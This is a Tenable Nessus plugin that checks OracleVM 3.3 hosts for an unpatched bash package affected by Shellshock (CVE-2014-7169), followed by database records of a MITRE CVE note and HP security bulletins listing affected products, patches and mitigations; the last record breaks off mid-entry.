ID ORACLEVM_OVMSA-2014-0021.NASL Type nessus Reporter This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2022-01-31T00:00:00
Description
The remote OracleVM system is missing necessary patches to address critical security updates :
(CVE-2014-7169) Resolves: #1146322
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The package checks in this plugin were extracted from OracleVM
# Security Advisory OVMSA-2014-0021.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(78237);
script_version("1.17");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/01/31");
script_cve_id("CVE-2014-7169");
script_bugtraq_id(70137);
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/07/28");
script_name(english:"OracleVM 3.3 : bash (OVMSA-2014-0021)");
script_set_attribute(attribute:"synopsis", value:
"The remote OracleVM host is missing a security update.");
script_set_attribute(attribute:"description", value:
"The remote OracleVM system is missing necessary patches to address
critical security updates :
- (CVE-2014-7169) Resolves: #1146322");
# https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000222.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dadbd467");
script_set_attribute(attribute:"solution", value:
"Update the affected bash package.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2014/09/24");
script_set_attribute(attribute:"patch_publication_date", value:"2014/09/26");
script_set_attribute(attribute:"plugin_publication_date", value:"2014/10/10");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:bash");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"OracleVM Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/OracleVM/release");
if (isnull(release) || "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM");
if (! preg(pattern:"^OVS" + "3\.3" + "(\.[0-9]|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3", "OracleVM " + release);
if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu);
if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu);
flag = 0;
if (rpm_check(release:"OVS3.3", reference:"bash-4.1.2-15.el6_5.2")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "bash");
}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nMITRE is currently using CVE-2014-7169 to track the report of the\r\nincomplete patch, i.e., incorrect function parsing that's present in\r\nbuilds that are up-to-date with the\r\nhttp://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 changes. We\r\nrealize that other people may be releasing further information about\r\nthe technical details and implications later. CVE-2014-7169 expresses\r\nthe affected upstream versions as "GNU Bash through 4.3 bash43-025" --\r\nin general, this would include distribution packages released earlier\r\ntoday (2014-09-24).\r\n\r\n- -- \r\nCVE assignment team, MITRE CVE Numbering Authority\r\nM/S M300\r\n202 Burlington Road, Bedford, MA 01730 USA\r\n[ PGP key available through http://cve.mitre.org/cve/request_id.html ]\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (SunOS)\r\n\r\niQEcBAEBAgAGBQJUI3DaAAoJEKllVAevmvms+/kH/32ZGjC+BSqKoz6ZBUCMLnQ2\r\n+Li91/GvD0Rs8bqKPDsz30spiJR57ZluKMrlxJrlIffiHqAFiYkQ3+JXmnK/HAnA\r\nOtgToNtZ+1BV2jPrjXhuy2h+E5paTXMhM0T12xaUo89vtE7oer4Pld4JDqreXSSk\r\n1Nfu5AaGcvbBmwaNRn1qw+nARw0CFPmMRa169jQAesAAcyNx8V7IPgFpPj4K4S8c\r\n0zKXVdhIZxXvPcdZ5QzXKhcluOyOl1dJsjXR1qXT03QJsvhRighqb/3dZy+4mLyl\r\nJWhDfs7l8XXGCzbF8eSg2CNBpTGy1d/32F7YqaKj53xWFWyktHtbk4nJ5hlPlKU=\r\n=E9tp\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-09-25T00:00:00", "title": "[oss-security] Re: CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31106", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31106", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04467807\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04467807\r\nVersion: 1\r\n\r\nHPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System\r\n(vCAS) running Bash Shell, Remote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-09-30\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Remote Device\r\nAccess: Virtual Customer Access System (vCAS) running Bash Shell . This is\r\nthe Bash Shell vulnerability known as "ShellShock" which could be exploited\r\nremotely to allow execution of code.\r\n\r\n NOTE: The vCAS product is vulnerable only if DHCP is enabled.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101724\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nvCAS version 14.06 (RDA 8.1)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP Remote Device Access: Virtual Customer Access System (vCAS)\r\nrunning Bash Shell. This bulletin will be revised when the software update is\r\nreleased.\r\n\r\nNOTE: HP recommends to not power-down or disconnect the vCAS until the update\r\nis available.\r\n\r\nMITIGATION INFORMATION\r\n\r\nA Shellshock attack requires the definition of an environment variable\r\nintroduced into Bash. The vCAS has three attack vectors: SSH, the lighttpd\r\nweb server, and the DHCP client.\r\n\r\n - The exploit does not elevate privileges.\r\n - The SSH and webserver exploits require vCAS credentials so there is no\r\nrisk for unauthorized access or code execution through this vulnerability.\r\n\r\nThe DHCP client uses Bash scripts and is vulnerable to Shellshock. The DHCP\r\nexploit can be mitigated by ensuring that DHCP is disabled on the vCAS.\r\n\r\n Note: HP strongly discourages the use of DHCP on the vCAS.\r\n\r\nThe web UI forces the vCAS user to assign a static IP address and change the\r\nhp-admin password. A vCAS user must manually configure DHCP for use on the\r\nvCAS.\r\n\r\nA vCAS user can verify that DHCP is disabled by inspecting the file\r\n"/etc/network/interfaces" and ensuring that the "iface" line for device\r\n"eth0" is set for a static IP.\r\n\r\n Example of a static IP configuration:\r\n\r\n # The primary network interface\r\n auto eth0\r\n iface eth0 inet static\r\n address 172.27.1.68\r\n netmask 255.255.255.0\r\n gateway 172.27.1.1\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQrBP4ACgkQ4B86/C0qfVmXyQCfcKhAA0uY3dImfSwtEVk8Za3c\r\nvj4AnjNi4SmLcQFrPcGjdzRDt8U1OGS/\r\n=6Tia\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "[security bulletin] HPSBGN03117 rev.1 - HP Remote Device Access: Virtual Customer Access System (vCAS) running Bash Shell, Remote Code Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31135", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31135", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471546\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471546\r\nVersion: 1\r\n\r\nHPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-03\r\nLast Updated: 2014-10-03\r\n\r\nPotential Security Impact: Injection of code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with certain HP Thin\r\nClients running bash. The vulnerabilities, known as shellshock could be\r\nexploited remotely to allow execution of code.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101728\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nNote: all versions of HP Thin Pro and HP Smart Zero Core operating systems\r\nprior to version 5.1.0 are affected by this vulnerability. Following is a\r\ncomplete list of affected operating systems.\r\n\r\nHP ThinPro\r\n\r\nHP ThinPro 5.0 (released June 2014)\r\nHP ThinPro 4.4 (released November 2013)\r\nHP ThinPro 4.3 (released June 2013)\r\nHP ThinPro 4.2 (released November 2012)\r\nHP ThinPro 4.1 (released March 2012)\r\nHP ThinPro 3.2 (released November 2010)\r\nHP ThinPro 3.1 (released June 2010)\r\nHP ThinPro 3.0 (released November 2009)\r\nHP ThinPro 2.0 (released 2009)\r\nHP ThinPro 1.5 (released 2009)\r\nHP ThinPro 1.0 (released 2008)\r\n\r\nHP Smart Zero Core\r\n\r\nHP Smart Zero Core 5.0 (released June 2014)\r\nHP Smart Zero Core 4.4 (released November 2013)\r\nHP Smart Zero Core 4.3 (released June 2013)\r\nHP Smart Zero Core 4.2 (released November 2012)\r\nHP Smart Zero Core 4.1 (released March 2012)\r\nHP Smart Zero Core 4.0 (released March 2011)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has released the following software updates to resolve the vulnerability.\r\n\r\nProduct Affected\r\n Product Versions\r\n Patch Status\r\n\r\nHP ThinPro and HP Smart Zero Core (X86)\r\n v5.1.0 and above\r\n No update required; the Bash shell patch is incorporated into the base\r\nimage.\r\nIf you participated in the ThinPro 5.1.0 beta program upgrade to the release\r\nversion as soon as it becomes available.\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v5.0.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86.xar .\r\nThe update can be also downloaded directly from ftp://ftp.hp.com/pub/tcdebian\r\n/updates/5.0/service_packs/SecurityUpdate-CVE20146271-CVE20147169-all-5.0-x86\r\n.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (x86)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-x86.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core (ARM)\r\n v4.4.x\r\n A component update is currently available through Easy Update as:\r\nSecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar .\r\nOr can be downloaded directly from ftp://ftp.hp.com/pub/tcdebian/updates/4.4/\r\nservice_packs/SecurityUpdate-CVE20146271-CVE20147169-all-4.4-arm.xar\r\nOr via softpaq delivery at:\r\nftp://ftp.hp.com/pub/softpaq/sp69001-69500/sp69071.exe\r\n\r\nHP ThinPro and HP Smart Zero Core\r\n v4.3x and earlier\r\n An update will be made available for customers upon request\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 03 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQuzswACgkQ4B86/C0qfVlEmwCeKmjiIhep4sXipKg6EBSF8f5L\r\nmYcAnRPAcBRS9bs0c+WaszC9E7lEhSC/\r\n=dPt5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "[security bulletin] HPSBHF03124 rev.1 - HP Thin Clients running Bash, Remote Execution of Code", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31125", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31125", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04471532\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04471532\r\nVersion: 1\r\n\r\nHPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-10-09\r\nLast Updated: 2014-10-09\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreAll\r\nOperating System Software running Bash Shell. This is the Bash Shell\r\nvulnerability known as "Shellshock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nReferences:\r\n\r\n CVE-2014-6271\r\n\r\n CVE-2014-7169\r\n\r\n SSRT101717\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreAll Operating System Software v6.5.3 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software updates available to resolve the\r\nvulnerability with HP StoreAll Operating System Software running Bash Shell.\r\n\r\n - HP StoreAll OS v6.5.5\r\n\r\n - HP StoreAll OS v6.3.4\r\n\r\n Note: HP StoreAll OS v6.3.4 will be available soon. This security\r\nbulletin will be revised when it is available.\r\n\r\n To request an upgrade or installation:\r\n\r\n 1. Go to: http://www.hp.com/support/storeallsoftware\r\n\r\n 2. Under Download Index, select Software, then select Obtain software.\r\n\r\n 3. Complete the software registration form, and the HP StoreAll\r\nadministrator will contact you for the next steps.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 October 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQ3EYoACgkQ4B86/C0qfVlGiwCg5w4oGFIiHcG0BQW5u4uoPxef\r\nzhMAoNKjX1w2l4V/RvE12LAfaB6he8Ak\r\n=V6d1\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-13T00:00:00", "title": "[security bulletin] HPSBST03122 rev.1 - HP StoreAll Operating System Software running Bash Shell, Remote Code Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-13T00:00:00", "id": "SECURITYVULNS:DOC:31150", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31150", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04468293\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04468293\r\nVersion: 2\r\n\r\nHPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell,\r\nRemote Code Execution\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-09-30\r\nLast Updated: 2014-10-01\r\n\r\nPotential Security Impact: Remote code execution\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP DreamColor\r\nZ27x Professional Display running Bash Shell . This is the Bash Shell\r\nvulnerability known as "ShellShock" which could be exploited remotely to\r\nallow execution of code.\r\n\r\nNOTE: Only the HP DreamColor Z27x model is vulnerable.\r\n\r\nReferences:\r\n\r\nCVE-2014-6271\r\nCVE-2014-7169\r\nSSRT101725\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP DreamColor Z27x\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted product\r\nversions of HP DreamColor Z27x Professional Display. The display provides\r\ncalibration and remote management functionality running on embedded Linux,\r\nwhich includes a bash shell. The shell is not accessible via the standard\r\ncalibration or remote management interfaces.\r\n\r\nThis bulletin will be revised when the firmware update is released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 September 2014 Initial release\r\nVersion:2 (rev.2) - 1 October 2014 Clarified Resolution\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlQsiJAACgkQ4B86/C0qfVkNaACguv7uwEW8LXyHRpAZ7rsOihoS\r\nmTcAn1o+pVwNz5a5E5FKWg/w0fJHt0Sx\r\n=6l1G\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-10-05T00:00:00", "title": "[security bulletin] HPSBHF03119 rev.2 - HP DreamColor Professional Display running Bash Shell, Remote Code Execution", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6271"], "modified": "2014-10-05T00:00:00", "id": "SECURITYVULNS:DOC:31130", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31130", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "description": 